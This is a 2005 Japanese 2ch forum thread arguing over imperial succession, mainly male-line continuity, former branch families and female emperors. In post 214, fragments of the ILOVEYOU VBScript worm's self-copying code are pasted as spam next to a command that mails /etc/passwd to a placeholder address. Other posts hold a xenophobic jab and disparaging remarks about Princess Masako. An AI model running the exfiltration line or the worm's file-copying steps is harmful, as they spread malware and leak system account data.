系統は属してるか属して無いかで、系統は相続対象でも無い。
今上陛下は香淳皇后から遡ったの女系系統に属してるし、
皇太子様は美智子皇后から女系で遡って規定される起源からの系統にも属してるのです。
だから、完全に男女関係無く平等に双方の系統に属してるし、
女系では男系は排除されるのだから系統に男女は無い。
そして、皇統は男系で遡って規定されてる系統だからで、
男女とか男系女系だからでは無い。
系統か別系統かの問題なのです。 
だから、制度的名義がどうであろうと制度外の皇統でも正統な系統なのです。


159 :名無しさん@6周年:2005/11/18(金) 14:04:53 ID:PTchjzNf0
愛子様が天皇になるとどんな陣形が開発できるの?
ラピッドストリーム?

160 :名無しさん@6周年:2005/11/18(金) 14:09:03 ID:Wb+9VPlgO
一、旧皇族復帰→旧皇族即位→愛子(女性皇族)皇后→息子即位(男系男子)

二、旧皇族復帰→愛子(女性皇族)天皇即位→夫は旧皇族→息子即位(男系男子)

一が妥当だが世論云々で、ウルトラCの二になるかもしれない。これは皇室の歴
史に一度もないが、論理的には不可能ではないな。

161 :名無しさん@6周年:2005/11/18(金) 14:10:02 ID:+7jZ0x76O
>>152
高橋の方が全然、分かりにくい。
貴方や高橋の方が詭弁ですね。
それでは、何故、あの一族に象徴の名義を強制したり、特別としてるのか理由を説明出来てないね。
その論理なら誰でも良いのだから、天皇氏族を制度と切り離してから言うべきだけど、
それを言わないのは、あの一族だからこそ象徴の規定に相応しいと考えてる。
しかし、貴方の論理では大統領制が一番てす。   
あと、TBSの調査では国民の八割近くが天皇、皇室から意見を聞くべきと答えてます。


162 :名無しさん@6周年:2005/11/18(金) 14:11:32 ID:XgfPhs7+0
愛子即位→夫は民間人(アンタ誰よ)→そして伝説へ・・・

の悪寒特大

163 :名無しさん@6周年:2005/11/18(金) 14:12:30 ID:7wmfMU7v0
「愛子女帝に」「愛子ちゃんでいいじゃん」て言う人に聞きたい。

そもそも何で将来の天皇に、とまで言うのに報道規制されてまともな映像一つないの?




164 :名無しさん@6周年:2005/11/18(金) 14:12:39 ID:PTchjzNf0
>>162
愛子様を超サディストに仕立て上げねば

165 :名無しさん@6周年:2005/11/18(金) 14:14:59 ID:ftJrgeNU0
>>161
>一族に象徴の名義を強制したり、特別としてるのか理由を説明出来てないね。

それも感情論で説明がつくわけで
廃止でも男系でも女系でも長子直系でもなんでも、
政治のうえで一番都合がいいのを選ぶんだから。

八木氏の詭弁については突っ込みどころを突っ込んだだけで、
あれで納得するのも馬鹿じゃないかと言いたいだけだよ。

166 :名無しさん@6周年:2005/11/18(金) 14:15:17 ID:FPW9vQOz0
>>162
そうなるころにはここにいる誰も生きていないだろうが
皇統継承した、旧皇族の誰かが「我こそは真の皇位継承者」
で、本家と元祖あらそいが絶対発生するな。


167 :名無しさん@6周年:2005/11/18(金) 14:15:22 ID:7wmfMU7v0
>>160

その(1)がベスト!


168 :名無しさん@6周年:2005/11/18(金) 14:18:10 ID:+7jZ0x76O
>>161は少し誤解してた。高橋と同じ事を言ってると勘違い。でも一応反論。
>親しみ
個人崇拝かマスコミ崇拝でも目指すならいざ知らず、それは天皇の本質とは関係無いけど一応コピペ。
153:名無しさん@3周年 :2005/11/11(金) 02:41:14 ID:YFay6VMx [sage]
>>16
脳内妄想乙。勝手に国民を語らないのと、レッテルじみた事を張らないよつに。
>知らない・・・
って、エ〜天皇って知名度だったんですか。なら、マスコミに取り上げて貰わないとね。
先ず連れてくるにしても子供だから。しかも、天皇即位はその子供とか、もしくは女性皇族との間に出来た子です。 前提が違う。
それに、天皇とは今上陛下のみへの個人崇拝では無い。
「あの方の血を〜」みたいな個人崇拝のものでは無いですよ。 
今上陛下も歴代天皇全ての血を引いてる訳では無い。
それに直系主義は無理なのです。愛子様に子が産まれるとも限らないしね。
悩み苦しませるだけに成る。女系強要派は天皇家の事も個人の事も考えない人ばかりですね。
それに知名度とか親しみとかマスコミです。
それで、選ぶならマスコミが継承順位を選べば良い事でしょ。
感想で皇統の正統は決まらない。
568:名無しさん@6周年:2005/11/02(水) 23:56:39 ID:gzL6Sag30 [sage]
・現天皇家も所詮傍系の一族。
・天皇という位は傍系を渡り歩くのが自然な姿。
・男系というルールが有史以来続くルールである。
この辺を国民に知らしめれば、ルールを重んじる日本人なら男系維持で納得すると思う。


169 :名無しさん@6周年:2005/11/18(金) 14:18:25 ID:Wb+9VPlgO
>>153
違う。歴代天皇は八人十代。四人は寡妃(未亡人)で残りは生涯独身。推古天皇
は皇后であり、夫である天皇の死後即位している。もちろん推古天皇自身も天皇の娘という血筋だから問題はなく、産まれた子供は夫の天皇(男系)だから男系となる。
ただ愛子様の場合は残りの四人(孝謙天皇など)と同じ立場だから生涯独身とな
ってしまう。女性天皇に共通するのは男系を守っているということ。その場合は
一、皇后。二、生涯独身しかない。愛子様は皇族と結婚するか生涯独身しかない
。ようは男系を守るためには民間人とは結婚できないということだ。

170 :名無しさん@6周年:2005/11/18(金) 14:21:02 ID:FPW9vQOz0
有識者wもマスコミもこういう時こそ、アジアを見れよ
タイや、ネパール、ブルネイがどうやって、血の継続を担保しているか。
なんで、欧州ばかり例えにあげるんだろ、アジア重視なのに


171 :名無しさん@6周年:2005/11/18(金) 14:23:13 ID:+7jZ0x76O
>>165
何一つ説明に成ってないですよ。
どう観ても、貴方や高橋の方が詭弁に見えます。
感情論と言いますけど、いったい誰の感情なのですかね。
人の感情なんか分かりませんし、
貴方の感情では無いのなら、それ自体が詭弁に成る。
また、貴方の感情だと言うなら、現段階の感情を強要するべきではありません。


172 :名無しさん@6周年:2005/11/18(金) 14:24:15 ID:7wmfMU7v0
大体皆難しく考え過ぎ。
男系男子が継ぐ、それだけのこと。
直系が絶えたら傍系に、それだけのこと。
今回はA宮家、男子が絶えたら次回はB宮家、それでいい。
ただ絶対条件は父をたどると神武天皇に行き着くこと、それだけ。

皆レス長すぎ、読む気もしねえ。


173 :名無しさん@6周年:2005/11/18(金) 14:25:30 ID:JDsqREWgO
個人的には
今上→皇太子→秋篠宮→旧皇族の男系男子
のような継承が理想だと考えるが、これは現実には難しいだろうね。
女系容認がもはや止められないなら、愛子さまの婿に旧皇族の男系男子を迎えるようにする(言葉は悪いが周囲の人間がそうなるように仕向ける)しかないだろう。
第一子優先継承だと、愛子さまの件を乗り切れても、後世の天皇の第一子が女子だとまた問題になるが。

174 :名無しさん@6周年:2005/11/18(金) 14:26:36 ID:PTchjzNf0
関係無いが紀元前のエジプトでは近親相姦が続いて王家にたわけが続出したそうな
なんでも濃い血は天才を生むと言う信仰があったとか

175 :名無しさん@6周年:2005/11/18(金) 14:27:12 ID:J0PibWDb0
一般的な感覚だと、
「なんで男系派は愛子様を即位させるのを嫌ってるの?
 なんて考えの古い人たちなんでしょ、軽蔑しちゃうわ」
ってとこなんだよね。

176 :地球市民:2005/11/18(金) 14:29:43 ID:A31/svaB0
>>173
> 女系容認がもはや止められないなら、愛子さまの婿に旧皇族の男系男子を迎えるようにする(言葉は悪いが周囲の人間がそうなるように仕向ける)

男系派にとってはこれが一番現実的かと。
世論の大勢をひっくり返すのは至難の業だし。

小さい頃から「お前には2000年の伝統維持がかかってるぞ」と
プレッシャかけ続けて旧宮家の同世代の男系男子との触れ合いの場を
多く設ければ、そうなってくれる可能性もより高まるよw

177 :名無しさん@6周年:2005/11/18(金) 14:30:16 ID:+7jZ0x76O
>>166
争いなんか多分、起こらないよ。
正統の意味や系統や神話や口伝を、
教え伝えて少しずつ徐々に正統支持を広める事は有ると思うけど。
大体、サーヤの結婚式の斎主が旧皇族なんですよ。
菊栄親睦会など行事や祭祀を共にして争いは無い。
あくまで、正統を教え伝えて徐々に広めるくらいですね。
布教みたいな感じですかね。
もしくは↓
206:名無しさん@6周年 :2005/11/11(金) 10:53:16 ID:w+6JNwVV0 [sage]
こうなったら徳川慶喜の理論に学ぶ。
「徳川宗家は継ぐが、将軍職はつがない」
まあ、実際は将軍職を継いで徳川宗家はのちに別のものが継ぐという皮肉な結果になったわけだが、この理論は使える。

万世一系の皇統を守るために宗家はあくまで男系が継ぐべし。
「天皇職」は宮内庁や内閣が好きに決めろ。



178 :名無しさん@6周年:2005/11/18(金) 14:31:45 ID:ftJrgeNU0
>>171
理解する気もないだけじゃないの。

ヒント:漏れは自分自身は何系支持とも何もいっとらんよ。

179 :名無しさん@6周年:2005/11/18(金) 14:33:59 ID:7wmfMU7v0
>>173
全然難しくないよ。
俺は何の違和感もない。
ミーハーでキャー○子さま〜、なんて言ってるおばちゃん連中なんて
コロッと変わるよ、キチンと正統性を説明すればね。
今度は○宮(旧宮家男子)さま〜、なんてすぐ言うからw
それがイケメンで今の姫君達と結婚でもして、可愛い男子でも生まれよう
ものなら、昔のことなんかすっかり忘れてるよ。
そんなもんだ。


180 :名無しさん@6周年:2005/11/18(金) 14:36:13 ID:J0PibWDb0
>>176
> 愛子さまの婿に旧皇族の男系男子を迎えるようにする
むしろそういう声が民間から無言のプレッシャーというかたちで、
愛子様周辺を取り巻くことになると思う。
で、おいらは、それはあまりに忍びないことだと思う。

181 :名無しさん@6周年:2005/11/18(金) 14:37:21 ID:+7jZ0x76O
>>176
女性天皇賛成か反対かは有るが、男系維持に賛成かなんて無いから。

654:名無しさん@6周年 :2005/11/14(月) 02:00:14 ID:5Qp05qwHO [sage]
>>631
養子の提案は、見事に無視されてますよ。
男系の意味や維持の方法を無視してる中では、女系反対だけだと、他に方法が無いみたいで、天皇制度廃止か女性天皇容認かの2択に成る。
養子など他の方法も有る事を詳しく丁寧に、皇統の意味と共に提案しないといけない。
寛仁親王の養子方式などの表現をマスコミは無視してるからこうなる。
だから、女性、女系か解るようにでは無く、男系維持の方法や男系の意味を伝えないといけない。
そるに、女性天皇に容認か反対かとのは有るが、男系維持に賛成かなんてのは無い。
大体、税金、年金と違い、この手の問題は、
天皇陛下や国会が示せば、大抵が容認に成る。
だから、天皇に何も意見を言うなと必死に成る。
雅子様や愛子様が嫌と言えば一発だったりして。
氏族、家庭の在り方の問題なので、一般でも総理職に女性が成れるかどうかと違い、
普通に容認に成る。
だから皇族に意見を言うなと女系派は必死に成る。
テレビも寛仁親王の養子の表現を、一般には養子は良く有る事で理解しやすいので避けたりしてる。
436:名無しさん@6周年 :2005/11/14(月) 09:25:54 ID:5Qp05qwHO [sage]
この時期に結婚式の祭主が旧皇族なのを無視するマスコミ。
結婚に関わる行事に旧皇族が参加してるのをワザと無視するマスコミ。
こんな情報統制や操作が有るのに何が国民なんだよ。
あと、TBSの調査では国民の八割近くが天皇、皇室から意見を聞くべきと答えてます。


182 :名無しさん@6周年:2005/11/18(金) 14:38:12 ID:Wb+9VPlgO
三、旧皇族復帰→愛子様(女性皇族)と旧皇族結婚、息子誕生→現皇太子即位→
秋篠宮即位→愛子様(女性皇族)と旧皇族の息子即位(男系男子)

四、旧皇族復帰→愛子様(女性皇族)と旧皇族結婚、息子誕生→現皇太子即位→
秋篠宮即位→「中継ぎ」で愛子天皇(女性皇族)即位→息子即位(男系男子)

三・四は旧皇族を復帰させるものの、皇位継承順位の関係で皇位につけない場合
を想定。女性皇族と旧皇族の結婚、息子誕生時点で旧皇族の皇位継承権が下がる
のでこのような場合も想定できよう。三は現状を維持し、皇位継承順位を変更さ
せない(女性に与えない)場合。四は皇太子、秋篠宮が天皇になり崩御した際、
息子が幼いときの緊急的措置。ただ天皇は退位できないから、推古天皇のように
息子より長生きしてしまい、継承者がいなくなるかもしれない諸刃の剣。

一〜四までが現実に想定され得る男系維持の即位パターンだ。他にあるかな?

183 :名無しさん@6周年:2005/11/18(金) 14:39:55 ID:dy7gFid00
代議士はバカと相場がきまっている。

184 :名無しさん@6周年:2005/11/18(金) 14:40:09 ID:+7jZ0x76O
>>181の他に↓こんなのも。
養子は一般でもよく有る権利だからね。一般と同じにするだけなので反対は少ない。
あと、女系強要派は意見が無く雰囲気ばかりしか語らないはね。
その雰囲気も、女性、女系容認の他に方法が無いみたいで、
天皇制度廃止か女性天皇容認かの2択しかないと勘違い成るような方法。
養子など他の方法も有る事を提案しないといけないのに、
寛仁親王の養子方式などの表現をマスコミは無視。そんな中での雰囲気だから。
それにコピペをすると、ヒトラーの台頭も時代だから。戦争もそう言う時代だった。
翼賛会も時代からそう成った。昭和恐慌などの時代の影響も有る。
バブル投資もそう言う時代の波だった。
時代で、その時の雰囲気や感想、感情で天皇を決めるべきでは無いです。



185 :名無しさん@6周年:2005/11/18(金) 14:42:00 ID:7wmfMU7v0
>>180
個人的にあの東宮夫婦が婿に旧宮家の男子なんか絶対認めないと思われ。
だからこそ「愛子女帝」は反対。
眞子様はまだ期待が持てるが、それでも結婚は両者の合意がなければ難しい。
強制するのはあまりにもむごい。
やはり「帝位」には男子が就くべき。
「女系」が嫌だ、という頭があるならもういい加減腹くくれ、覚悟を決めろってこった。


186 :名無しさん@6周年:2005/11/18(金) 14:47:23 ID:Wb+9VPlgO
>>160>>182は養子を想定しない制度だった。養子を導入させれば、またかわっ
てくるな。だれか想定してみてくれ。

養子制を取り入れれば、その範囲が問題となるな。すべての旧皇族を含めるのか
、未成年者だけか、まだ生まれていないものに限るかなど。さらに養子の皇位継
承順位もあるし。男系維持のパターンは全部で10通り近くはありそうだな。

187 :名無しさん@6周年:2005/11/18(金) 14:50:29 ID:mLSX3vhL0
紀子様にもっと産ませろよまだ39だろ

188 :名無しさん@6周年:2005/11/18(金) 14:51:40 ID:JDsqREWgO
>185
私は男系派だが、男系を維持するために愛子さま、眞子さまに旧皇族の男系男子との結婚を強制するのは賛成できない。
愛子さま、眞子さまには旧皇族の男系男子に関わらず自由に結婚してほしい(実際に自由な結婚ができるか疑問だが)。

189 :名無しさん@6周年:2005/11/18(金) 14:52:45 ID:J0PibWDb0
>>185
ひとりの女性を無残なまでに苦しめることになるであろう“女系”を容認するリベラルってのはまったく...

190 :名無しさん@6周年:2005/11/18(金) 14:55:43 ID:OaQonS7T0
所詮この手のニュースは産経新聞しか報道しないんだよ

191 :名無しさん@6周年:2005/11/18(金) 14:56:08 ID:H8R7bfZI0
結局、この議論はここに行き着くようだね

  皇位(=日本、和の心)の私物化は許されない
→ 皇位は先代、先々代(の君民含めた祖先)から預かって未来の子孫へと繋ぐもの
→ 直系優先ではなく時に傍系に移ることで皇位の源泉を確認し、先祖(神武天皇)
  からの積み重ねの重さを再認識する仕組みが万世一系

要するに女系ってのは、
我が家かわいさ、我が子かわいさで、皇位を自分たち=現世代の既得権のように
捉えて、自分のところ(直系)で相続をさせること。

一方、万世一系、男系継承は、わが家かわいさよりも先代から預かった伝統、 歴史、
蓄積の重み=皇位の源泉を重視して、これを守る義務感からいさぎよく他家(先代、
先々代…に遡った男系男子)に相続させる継承方法。

過去にも時代に応じて皇位継承のルールに変化があったが、何を変えて、何を変え
なかったのかを区別することが大事。
直系優先でなく、皇位を先代から預かったものとして男系継承、万世一系の原則
だけは、どんなことがあっても守ってきた。

吉川座長は傍系に移ることが不安定などと言っているが、逆だ。
今までの万世一系(男系)の継承方法は、何世代毎かに傍系に移ることを前提と
している。
いつも天皇に男子、男孫が授かるわけではなく、こうした際に傍系の他家に移す
ことで、皇位が直系相続できる私的なものではない、皇位の由来は現天皇家に
ではなく、先代、先々代…と神武天皇に遡る歴史的な繋がりにあるということを
君民共に確認できるような配慮が盛り込まれている継承方法なんだ。

おすすめサイト
【和の国、和の心 ― 天皇陛下と日本 長根英樹】
 http://nagane.kimono.gr.jp/hideki/messages/27_title_msg.html


192 :名無しさん@6周年:2005/11/18(金) 14:59:16 ID:7wmfMU7v0

もうさあコピペいいから、自分の言葉で話せよ!

俺は旧宮家男子がそのまま即位でいい。以上。


193 :名無しさん@6周年:2005/11/18(金) 15:06:03 ID:jkJLsYnx0
>>172

だから、それ(男系男子維持)のためには旧宮家の復帰が必要。それだけ。

194 :名無しさん@6周年:2005/11/18(金) 15:08:54 ID:jkJLsYnx0
>>185
>東宮夫婦が婿に旧宮家の男子なんか絶対認めないと思われ。

たとえ、そういう意見を持っていても東宮は政治力を行使できない。

195 :名無しさん@6周年:2005/11/18(金) 15:25:48 ID:GHSwdQrc0
>>188
同感。結婚はもはや本人同士の問題だよ。
むかしは傍系が継承した場合に先代の娘を皇后にしたことも多いけど、
側室復活が無理なのと同様、さすがに強制は出来ないだろう。

思うに、おそらく紀宮も、さんざん旧皇族との結婚話はあったのだと思う。
結婚が遅れたのはそのためだろう。
そのほうが望ましかったのは確かだけど、
それでも結局黒田さんと結婚した。
旧皇族男子と現皇族女子の結婚は強制できないし、
それを前提に制度をつくってはいけないと思う。



196 :名無しさん@6周年:2005/11/18(金) 15:30:51 ID:J0PibWDb0
>>195
本人同士の問題なのだが、、、
現状の浅い議論のまま女性・女系を認めると、
彼女らの結婚時に、マスコミが男の家柄とか格式はあーだこーだと騒ぐだろう。
必然的に議論になってしまう。
民間のプレッシャーとはそういう意味。

197 :名無しさん@6周年:2005/11/18(金) 15:35:18 ID:VuoSBXQH0
拙速というのにはハゲ同
無識者会議は死ね

198 :名無しさん@6周年:2005/11/18(金) 15:38:48 ID:928gVoiD0
安倍ちゃんはよくわかってるよ。
800年前の男系の復活などという
馬鹿げた話が国民に通用しないことを。


女系天皇容認、議論見守る=安倍官房長官

 安倍晋三官房長官は17日午前の記者会見で、超党派の国会議員による
日本会議国会議員懇談会が女性・女系天皇を容認する皇室典範改正に
関し慎重な検討を求めていることについて、「(政府の皇室典範に関する
有識者会議は)いろいろな意見があることを十分承知の上で取りまとめに
入っていると思う。有識者会議の議論を見守りたい」と述べた。 
(時事通信) - 11月17日13時1分更新

http://headlines.yahoo.co.jp/hl?a=20051117-00000062-jij-pol





199 :名無しさん@6周年:2005/11/18(金) 15:42:43 ID:ebEhbajqO
やはり安倍は外ヅラだけか
安倍は中国・北朝鮮担当相でいいよ

200 :名無しさん@6周年:2005/11/18(金) 15:50:48 ID:LRl9gxrp0
女系OK→愛子天皇→在日男性と結婚
→在日の子供→在日天皇→あんただれ?
→天皇制廃止

201 :名無しさん@6周年:2005/11/18(金) 15:55:46 ID:VdY7U1tw0
吉川座長は会見で「歴史は我々が作っていく立場で検討する」と述べ たわけだが本当に傲慢だな。
一見前向きで格好良く見えるが、結局過去との断絶を主張しているわけだ。
正直に「我々が新しい王朝を創出する」と言えよ。

202 :名無しさん@6周年:2005/11/18(金) 15:57:50 ID:z7JHbRVn0
>>198
脅かすなよ。まさに見守ってるだけじゃないか。

>>198 がどうしても男系男子を断絶させたいこと
だけは分かった。

203 :名無しさん@6周年:2005/11/18(金) 16:02:23 ID:CbHXbKDu0
>>196
いまでもマスコミは雅子妃が精神病になったことで、
数々の病気と言う名の我侭を放置してきてるんだし、
この先愛子が万が一結婚することになったとしても、
人権侵害を縦にとってなんの行動も起こさないに違いないよ。


204 :名無しさん@6周年:2005/11/18(金) 16:03:44 ID:ebEhbajqO
>>198

あれ

600年前のはずですが

増えてますね(笑)

205 :名無しさん@6周年:2005/11/18(金) 16:07:48 ID:TOIa7jDG0
伝統を守るための議論で伝統そのものを破壊してどうする。
側室をもてない現代なんだから皇族復活で確立を増やせよ。

206 :名無しさん@6周年:2005/11/18(金) 16:28:19 ID:J4vjozcp0
長子継承となると、そのへんの一般人が天皇になれるんだなw

例:

現皇太子(♂)(126代) 一般人オワダさんとご結婚
愛子(♀)(127代)  父:126代天皇  母:オワダさん     一般人スズキさんとご結婚
天皇(♀)(128代)  父:スズキさん  母:愛子天皇   一般人ホンダさんとご結婚
天皇(♂)(129代)  父:ホンダさん  母:スズキ家の長女  一般人ヤマハさんとご結婚
天皇(♀)(130代)  父:ホンダ家長男  母:ヤマハさん

こんな天皇、なんのありがたみも無いだろw

207 :名無しさん@6周年:2005/11/18(金) 16:30:51 ID:3Ia1j3q/0
>>205
だな。
傍系男子継承は前例がある。
いま有る可能性を捨てる必要は無い。

「世はいかに 開け行くとも いにしえの
    国のおきては たがえざらなむ」(明治天皇御製)

208 :名無しさん@6周年:2005/11/18(金) 16:41:53 ID:Vj6n3OYr0
復活させる旧皇族の中では現在の皇室との
血縁の濃さという点で東久邇宮系が第一候補だな。


209 :名無しさん@6周年:2005/11/18(金) 16:48:43 ID:xDtLqIvU0
>>198
いろんな反対意見があるのに、有識者会議で一方的な方向で議論
をまとめてもあとでひっくり返しますよ、という予告をしてるんだな、
安倍さんは。

官房長官としては有識者会議の結論が出てないのにその過程に
影響与えるようなことは言わないという一線は守ってるようだが。

いずれにせよ、あのメンツだから偏った結論が出てくるのに
違いはないからな。それからでしょう。

210 :名無しさん@6周年:2005/11/18(金) 16:51:11 ID:J4vjozcp0
>>208
父親は事実上皇族であるも同じで、母親が昭和天皇の娘だからか?

あとは、明治天皇の娘を嫁にもらった宮家がいくつか無かったか?

211 :名無しさん@6周年:2005/11/18(金) 17:12:58 ID:Wb+9VPlgO
>>207
しかも最後の130代天皇は22〜23世紀の天皇だろ。その頃の世界はわからないが
、天皇制廃止になるな。



212 :名無しさん@6周年:2005/11/18(金) 17:13:24 ID:lWz1qDCY0
まーた気違いが湧いてるな

213 :名無しさん@6周年:2005/11/18(金) 17:55:50 ID:zTGd4aKF0
>>198 :名無しさん@6周年:2005/11/18(金) 16:45:00 ID:928gVoiD0
>安倍ちゃんはよくわかってるよ。
>800年前の男系の復活などという
>馬鹿げた話が国民に通用しないことを。

570年前だよ、だんだん増えていっているw
安倍は男系女系の話はよく分かっているだろうが
現時点では動きようが無いということだろう?

つーか、おまえ、コピペうざい。


214 :日本会議:2005/11/18(金) 18:01:18 ID:4aX86AFx0
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

215 :名無しさん@6周年:2005/11/18(金) 18:01:39 ID:VnZCtyd40
今日の集会池よ

216 :名無しさん@6周年:2005/11/18(金) 19:58:11 ID:+7jZ0x76O
>>215
遠くてイケれないよ。こんな時に限って忙しいし。


217 :名無しさん@6周年:2005/11/18(金) 22:16:47 ID:Un3NKTb+0
>>210
竹田宮及び朝香宮だね。

218 :名無しさん@6周年:2005/11/18(金) 23:33:20 ID:kNMkHeLs0
今日の集会のルポまだ〜チンチン(AA略

219 :名無しさん@6周年:2005/11/18(金) 23:36:37 ID:7v3elyL50
天皇が病弱の場合摂政を置けるように、皇太子妃の場合も代理を置けばよいのに。

220 :名無しさん@6周年:2005/11/18(金) 23:45:52 ID:kNMkHeLs0
それならいっそのこと離婚・再婚の方が話が早いよ。
ホントに病気ならいい加減もう自ら身を引いて欲しいよ。
国民の我慢ももう限界だ。
さーやの結婚式に白ドレス・披露宴に一人だけ洋装をみてつくづくそう思った。


221 :名無しさん@6周年:2005/11/19(土) 01:48:40 ID:dfmedx3B0
>>219
>>220
摂政という制度があるのは、天皇が世襲制だからです。すなわち、個人の能力では全うできる仕事ではない。
特定の血統に在る方のみが皇位を継承できるからこそ、天皇制の意義がある。
ただ、その場合、病気などのため、天皇の地位についた人が天皇としての職務を取れないことがある。
そこで、摂政とか国事行為臨時代行という制度がある。この2つの制度は、常時使われるものではないが、天皇制を支える重要な制度である。
ところで、皇太子妃は、特定の血統に所属することは絶対条件ではない。しかも、結婚相手につき皇室会議の議決以外に条件のないなかでは、皇太子妃という役職は個人の能力に期待されるところが多し。
よって、皇太子妃として不適切な人間は代理を置くのではなく、更迭するのが当然である。皇太子妃という身分は、皇太子と結婚することにより取得するものであるから、
離婚すべきということになる。


222 :名無しさん@6周年:2005/11/19(土) 04:03:36 ID:7dN8vzu80
http://hw001.gate01.com/abc123xyz/index.htm

11月30日にも集会を催すようです

11/30(水) 「皇室典範を考える集い」
 18:30〜20:30
 ニッショーホール(日本消防会館)
 【参加費】無料
 港区虎ノ門二丁目9―16  電話03―3503―1486
 http://www.jaeic.or.jp/sk-3f-12.htm
-----------------------------------
登壇者
渡部昇一
工藤美代子
小堀桂一郎
櫻井よしこ
田久保忠衛
中西輝政
萩野貞樹
屋山太郎
有志国会議員多数

主催 皇室典範を考える会

223 :名無しさん@6周年:2005/11/19(土) 04:08:13 ID:ABZGsWRm0
>>220
IL||LI _| ̄|○ IL| そんな事やらかしたのか・・・

224 :名無しさん@6周年:2005/11/19(土) 05:57:33 ID:J87/0iMx0
あの有識者会議なるものの悪質さというのは、
単に女系を容認しただけではない、長子優先まで決めてる点ね。
なぜそれが問題かと言うと、
たとえ女系を容認したところで、旧宮家の男系男子を女帝の婿に入れれば、
自然と男系をこっそり維持できるにも関わらず、
長子優先なために、女帝の長子が女子だとそれさえ不可能になって、
完全に男系が断絶されて女系に移行してしまう点ね。
あいつらそこまで計算して、女帝容認から女系容認にステップアップし、
さらに長子優先でとどめをさしてやがるんだよね。
ここまでやってるからには、なみなみならぬ男系断絶の謀議を裏で図ってる国賊が
会議を裏で差配してる奴の中にいるとしか思えない。
しかも旧宮家の復活は認めない、そのため皇族の数が減るのを防ぐという名分で
女性皇族は結婚しても皇族の地位を維持するとしている。
この結婚しても皇族のままというのがクセ球。
というのも、ただでさえ、華族制度廃止して皇族の配偶者確保が困難になってるのに、
女性皇族が結婚しても民間人にならないとなれば、どう考えたって結婚相手がみつかるはずがない。
女帝の婿探しはどうするつもりなのか?という質問に、
それは我々の考える問題じゃない。埒外です。と言い放ってやがるからな、
この会議座長のロボット研究家は。信じられんよ。一体誰が婿に入るっていうんだよ。
現に今度黒田と結婚する人、本人の容姿の問題もあろうが、相手探すのに苦労しただろうが。
民間の仕事してる、皇族に見合うような男性が、
地位を捨てて皇室に入る決断なんてするはずがない。
この結婚後も女性皇族は地位を維持するという発想は、
実は女性皇族の結婚出産すら不可能にするための謀略ではないかと思えてしまう。
かように、この有識者会議のやってることは実に不遜で悪質と言わざるを得ない。
こいつらは単純に天皇制の安定的な維持を、時代に即して図ろうとしてるのではない。
男系を確実に断絶させることで天皇制の歴史的な基盤を破壊し、
次いで皇族の血統それ自体を消滅させようとすら企てている。
これはかつてGHQが、長期的に天皇制を衰亡死させるために、
まず外側の華族制度を解体し、次に臣籍降下によって宮家の数を削減させた陰湿な作戦の
延長で、最後の総仕上げをしてるんだよ。

225 :名無しさん@6周年:2005/11/19(土) 06:01:28 ID:J87/0iMx0
側室廃止したことで男系男子継承維持は困難だと言われてるけど、
考えてみれば、着床前遺伝子診断(PGD)による産み分けと養子制度創設によって、
ほぼ永続的な男系天皇制維持は可能なんだよね。
日本ではPGD産み分けは容認されてないから皇室といえど無理だろうが、
海外じゃアメリカを筆頭に容認されている。
臣籍降下してるから非皇族の民間人であり、海外で産み分けしようが文句言われる筋合いにもない。
傍系の男系男子らに、海外で確実な男子出産を確保してもらって、
天皇直系に男子がいなければ、傍流男系男子を養子にとって、
直系女子と結婚してもらえばそれで済む話だろ。 
別に結婚しなくても、そのまま皇位を継承すればいいとは思うけど。
男系男子は全員、アメリカで5人くらい男子をもうけてもらうようにすれば
気が付いたら男系男子がうようよいるような状態を回復できるだろ。
それを若いうちから皇族の養子に入れていけばいいわけだ。

生殖医療技術の発達によって生まれた
着床前遺伝子診断(PGD:Preimplantation Genetic Diagnosis)法により、
100%の確率で男女産み分けが可能になったため、皇統の存続は磐石となるでしょう。

医療 親が決めるベビーの性  (ニューズウィーク日本版 2004・2・4号)
■科学が挑む産み分けの神秘   最新技術から伝統的な手法まで3つの産み分け法

★男女の産み分け 6★
http://life2.2ch.net/test/read.cgi/baby/1066868615/904-910 (nwj記事抄録)
http://makimo.to/2ch/life2_baby/1066/1066868615.html 904-910 (PGDについて=nwj記事抄録)
着床前診断ネットワーク|着床前診断、受精卵診断について、・・・
http://www.pgd.ne.jp/
IFC|着床前診断プログラム
http://www.ifcbaby.net/n_program/program_pdg.html
男女産み分け、子どもの健康など調査…米医師チーム
http://www.yomiuri.co.jp/iryou/news/iryou_news/20051027ik05.htm
【社会】無申請で着床前診断、2例は男女産み分け[02/04]
http://news5.2ch.net/test/read.cgi/newsplus/1075841866/

226 :名無しさん@6周年:2005/11/19(土) 06:59:40 ID:dJwHH1QI0
>「女性・女系天皇容認やむなしの立場だ」
>(自民党の大前繁雄衆院議員)

こいつむかつくな。次は確実に落とせ。

227 :名無しさん@6周年:2005/11/19(土) 07:10:25 ID:QTVC/O180
女性天皇にも反対。法制化すべきではない。
女性天皇は緊急避難とみなされるべきである。
すなわち、警察官が逃亡する犯人を射殺することがあり、認められているとはいえ、
かくかくしかじかの場合に射殺することが許可される、と法律に書くのは間違っている。
個別の緊急避難として、特殊な事態であるとの意識を厳重にもって取り扱うべき事態である。
長い歴史の中でそのようなケースが数例あったからと言って、大手を振って一般承認すべきではない。

228 :名無しさん@6周年:2005/11/19(土) 07:11:28 ID:RuGRag4j0
351 名前:名無しさん@6周年[sage] 投稿日:2005/11/15(火) 03:12:56 ID:P713F1ds0
傍系継承なんて、2千年にわたる皇統の歴史においては日常茶飯事なんだよなあ。
朝日新聞もこの件に関しては男系維持に舵を切ったみたいだが、この間の記事でいいこと書いてあった。

皇室の歴史は傍系継承や臣籍復帰、女性天皇など、直系主義の例外のオンパレード。
しかし守られてきたものひとつある。それは男系だけだ。
有識者会議は、たかだかここ2,3代の継承のことしか考えていない。
そのために男系という、唯一の例外なき原則を無視して、正統性を揺るがせにしていいのか?

229 :名無しさん@6周年:2005/11/19(土) 07:12:03 ID:aYpCq0vF0
>サーヤの結婚式に白ドレス・披露宴に一人だけ洋装

これはもうだめかもわからんね

